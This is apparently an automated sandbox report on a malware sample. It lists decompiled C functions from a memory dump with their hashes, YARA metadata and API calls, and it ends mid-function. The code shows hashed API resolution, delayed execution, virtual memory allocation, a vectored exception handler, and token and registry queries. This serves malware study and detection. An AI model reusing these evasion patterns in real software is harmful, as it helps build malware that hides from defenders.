Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: ab664097ccb74f702bc9fcb350df5334d3f6e07cd3b45fe3ea6e1f0fdd510884
Instruction ID: 52f67dfabdce91e1a5b66ed3f5dd59b24b4a00f14446df33eacc33632091454d
Opcode Fuzzy Hash: ab664097ccb74f702bc9fcb350df5334d3f6e07cd3b45fe3ea6e1f0fdd510884
Instruction Fuzzy Hash: 5422F570628340AEEB51CB24C851BAF77A9AFD1318F10891DF4AAD7291EB34EC45C75B

Uniqueness

Uniqueness Score: -1.00%

Function 70981494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E70981494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E7098F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v76, E7098F568( &_v76) + 0x10);
				E7098F558( &_v80, E7098F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v84, E7098F568(_t325) + 0x10);
				E7098F558( &_v88, E7098F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v92, E7098F568(_t329) + 0x10);
				E7098F558( &_v96, E7098F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v100, E7098F568(_t333) + 0x10);
				E7098F558( &_v104, E7098F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v108, E7098F568(_t337) + 0x10);
				E7098F558( &_v112, E7098F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v116, E7098F568(_t341) + 0x10);
				E7098F558( &_v120, E7098F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v124, E7098F568(_t345) + 0x10);
				E7098F558( &_v128, E7098F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v132, E7098F568(_t349) + 0x10);
				E7098F558( &_v136, E7098F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v140, E7098F568(_t353) + 0x10);
				E7098F558( &_v144, E7098F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v148, E7098F568(_t357) + 0x10);
				E7098F558( &_v152, E7098F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v156, E7098F568(_t361) + 0x10);
				E7098F558( &_v160, E7098F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v164, E7098F568(_t365) + 0x10);
				E7098F558( &_v168, E7098F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v172, E7098F568(_t369) + 0x10);
				E7098F558( &_v176, E7098F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v180, E7098F568(_t373) + 0x10);
				E7098F558( &_v184, E7098F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v188, E7098F568(_t377) + 0x10);
				E7098F558( &_v192, E7098F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v196, E7098F568(_t381) + 0x10);
				E7098F558( &_v200, E7098F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v204, E7098F568(_t385) + 0x10);
				E7098F558( &_v208, E7098F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E7099413C(0xa5eabdf8, _t434);
				E7098F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E7098F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E7098F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E7098F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E7098F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E7098F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E7098F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E7098F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E7098F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E7098F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E7098F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E7098F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E7098F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E7098F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E7098F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E7098F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E7098F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E70981D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E7098B338( &_v248, _v256, _t481, _v252, _t318);
				E7098F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v296, E7098F568(_t410) + 0x10);
				E7098F558( &_v300, E7098F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v304, E7098F568(_t414) + 0x10);
				E7098F558( &_v308, E7098F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v312, E7098F568(_t418) + 0x10);
				E7098F558( &_v316, E7098F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E7098F8C4( &_v320, E7098F568(_t422) + 0x10);
				E7098F558( &_v324, E7098F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E7098BAB8(_t154,  *_t480);
				E7098F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E7098F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E7098F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E7098F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E7098F6F0( &_v316);
				return E7098F6F0( &_v356);
			}

0x70981494
0x70981498
0x7098149d
0x709814a3
0x709814ab
0x709814b0
0x709814bc
0x709814c0
0x709814d2
0x709814e8
0x709814f3
0x709814f4
0x709814f5
0x709814f6
0x709814f7
0x709814fa
0x709814fe
0x70981502
0x70981509
0x7098151b
0x70981531
0x7098153c
0x7098153d
0x7098153e
0x7098153f
0x70981540
0x70981543
0x70981547
0x7098154b
0x70981552
0x70981564
0x7098157a
0x70981585
0x70981586
0x70981587
0x70981588
0x70981589
0x7098158c
0x70981590
0x70981594
0x7098159b
0x709815ad
0x709815c3
0x709815ce
0x709815cf
0x709815d0
0x709815d1
0x709815d2
0x709815d5
0x709815d9
0x709815dd
0x709815e4
0x709815f6
0x7098160c
0x70981617
0x70981618
0x70981619
0x7098161a
0x7098161b
0x7098161e
0x70981622
0x70981626
0x7098162d
0x7098163f
0x70981655
0x70981660
0x70981661
0x70981662
0x70981663
0x70981664
0x70981667
0x7098166b
0x7098166f
0x70981676
0x70981688
0x7098169e
0x709816a9
0x709816aa
0x709816ab
0x709816ac
0x709816ad
0x709816b0
0x709816b4
0x709816b8
0x709816bf
0x709816d1
0x709816e7
0x709816f2
0x709816f3
0x709816f4
0x709816f5
0x709816f6
0x709816f9
0x709816fd
0x70981701
0x70981708
0x7098171a
0x70981730
0x7098173b
0x7098173c
0x7098173d
0x7098173e
0x7098173f
0x70981742
0x70981746
0x7098174a
0x70981751
0x70981763
0x70981779
0x70981784
0x70981785
0x70981786
0x70981787
0x70981788
0x7098178b
0x7098178f
0x70981793
0x7098179a
0x709817ac
0x709817c2
0x709817cd
0x709817ce
0x709817cf
0x709817d0
0x709817d1
0x709817d4
0x709817d8
0x709817dc
0x709817e3
0x709817f5
0x7098180b
0x70981816
0x70981817
0x70981818
0x70981819
0x7098181a
0x7098181d
0x70981821
0x70981825
0x7098182c
0x7098183e
0x70981854
0x7098185f
0x70981860
0x70981861
0x70981862
0x70981863
0x70981866
0x7098186a
0x7098186e
0x70981875
0x70981887
0x7098189d
0x709818a8
0x709818a9
0x709818aa
0x709818ab
0x709818ac
0x709818af
0x709818b3
0x709818b7
0x709818be
0x709818d0
0x709818e6
0x709818f1
0x709818f2
0x709818f3
0x709818f4
0x709818f5
0x709818f8
0x709818fc
0x70981900
0x70981907
0x70981919
0x7098192f
0x7098193a
0x7098193b
0x7098193c
0x7098193d
0x7098193e
0x70981941
0x70981945
0x70981949
0x70981950
0x70981962
0x70981978
0x70981983
0x70981984
0x70981985
0x70981986
0x7098198c
0x7098198f
0x70981991
0x7098199c
0x709819a3
0x709819ac
0x709819b4
0x709819bb
0x709819c4
0x709819cc
0x709819d3
0x709819dc
0x709819e4
0x709819eb
0x709819f4
0x709819fc
0x70981a03
0x70981a0c
0x70981a14
0x70981a1b
0x70981a24
0x70981a2c
0x70981a36
0x70981a3f
0x70981a47
0x70981a51
0x70981a5a
0x70981a62
0x70981a6c
0x70981a75
0x70981a7d
0x70981a87
0x70981a90
0x70981a98
0x70981aa2
0x70981aab
0x70981ab3
0x70981abd
0x70981ac6
0x70981ace
0x70981ad8
0x70981ae1
0x70981ae9
0x70981af3
0x70981afc
0x70981b04
0x70981b0e
0x70981b17
0x70981b1f
0x70981b26
0x70981b2f
0x70981b37
0x70981b3e
0x70981b43
0x70981b51
0x70981b55
0x70981b64
0x70981b6d
0x70981b72
0x70981b79
0x70981b7d
0x70981b81
0x70981b88
0x70981b9a
0x70981bb0
0x70981bbb
0x70981bbc
0x70981bbd
0x70981bbe
0x70981bbf
0x70981bc2
0x70981bc6
0x70981bca
0x70981bd1
0x70981be3
0x70981bf9
0x70981c04
0x70981c05
0x70981c06
0x70981c07
0x70981c08
0x70981c0b
0x70981c0f
0x70981c13
0x70981c1a
0x70981c2c
0x70981c42
0x70981c4d
0x70981c4e
0x70981c4f
0x70981c50
0x70981c51
0x70981c54
0x70981c58
0x70981c5c
0x70981c63
0x70981c75
0x70981c8b
0x70981c96
0x70981c97
0x70981c98
0x70981c99
0x70981c9a
0x70981c9d
0x70981ca0
0x70981ca1
0x70981ca2
0x70981ca9
0x70981cac
0x70981cb7
0x70981cbe
0x70981cc7
0x70981ccf
0x70981cd6
0x70981cdf
0x70981ce7
0x70981cee
0x70981cf7
0x70981cff
0x70981d04
0x70981d0d
0x70981d15
0x70981d2a

Strings

$#,, xrefs: 70981701

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: c0a6b87e3b829ed104ec82ee3f010ed691c3fe87a019103c44a8e37c142abe7e
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: C8324772404B059EC705DF20C862AAF77B0EFB1209F20571DB4996A2E1FF71FA86C652

Uniqueness

Uniqueness Score: -1.00%

Function 7099218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E7099218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E70993A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E70992F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x7099218c
0x70992190
0x709921ac
0x709921af
0x70992192
0x709921a1
0x709921a4
0x709921a4
0x709921bf
0x709921c4
0x709921c8
0x709921d0
0x709921d0
0x709921d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,709835C3,00000000,00000000,?), ref: 709921D0

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 5521d16974925142376a812aaf5a1431fc9393337a2662a0e393453d423c95ae
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: BBE09BB011E3016EEB549B288D01B6F7AEC9FC0211F21851DB595D62C4E630D810472B

Uniqueness

Uniqueness Score: -1.00%

Function 70992790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70992790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E70992F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x70992797
0x709927a0
0x709927ae
0x709927d1
0x709927d1
0x709927b0
0x709927c7
0x709927cb
0x00000000
0x709927cd
0x709927cd
0x709927cd
0x709927cb
0x709927d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,70998852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 709927C7

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 1d05412766553302686d10d43c963d13e651314300f97fc51d22b85835066065
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: D0E0157121D342AFEB09CA64CC15EAFBBEDAFC8201F108C1DB49A96550E760E844A726

Uniqueness

Uniqueness Score: -1.00%

Function 70993060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E70993060(intOrPtr* __ecx) {
				void* _t1;

				_push(E709933D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x70993060
0x70993065
0x70993067
0x70993069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,709933D8,70993050,A5EABDF8,A5EABDF8,?,70982530,00000001), ref: 70993067

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 4f49c702f3b879f27a6807fbb7ad3883cf1b6de3be5844531404757b9b50d974
Instruction ID: e363b735a5e610a4ae774ab10ab579a5b773e8de4e69028517cce639df3a6c28
Opcode Fuzzy Hash: 4f49c702f3b879f27a6807fbb7ad3883cf1b6de3be5844531404757b9b50d974
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 70991140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E70991140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E70992F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E7098C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E7098BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E7098F620( &_v32, _t24);
						_t54 = E7098F558( &(_t59[3]), 0);
						if(E70992F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E7098F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E70992F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x70991142
0x7099114f
0x70991151
0x70991160
0x70991164
0x7099116e
0x7099116e
0x70991174
0x70991177
0x70991179
0x70991184
0x709911be
0x709911c3
0x709911c8
0x709911c8
0x709911d4
0x70991186
0x70991190
0x709911a3
0x709911b4
0x709911b4
0x709911b6
0x709911bc
0x709911da
0x709911ea
0x70991201
0x709912e3
0x709912e7
0x00000000
0x70991207
0x70991217
0x7099121b
0x00000000
0x70991221
0x7099122d
0x70991234
0x00000000
0x7099123a
0x7099123a
0x7099123c
0x7099123d
0x7099123d
0x70991234
0x7099121b
0x00000000
0x00000000
0x00000000
0x709911bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 709911B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 70991217

Memory Dump Source

Source File: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true

Associated: 00000004.00000002.727609301.0000000070980000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727735438.000000007099A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.727759857.000000007099D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.727776829.000000007099F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction ID: 0025bb99f01ce838e625bebb4c48469dce05f97f7d5358971a1308b2c9a6f462
Opcode Fuzzy Hash: b379fc4a1587b84ebba4738689b04ff7e367b1b7f2a9b7906a93c638fa51d113
Instruction Fuzzy Hash: 3921AB70618206BEEB05DA28CC10FAF76EDAFD1204F20C82CB551C6290EF34D80AC767

Uniqueness

Uniqueness Score: -1.00%

Function 70995720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E70995720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E70992F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E7098F8C4(_a8, _t15);
							if(E70992F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7098F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
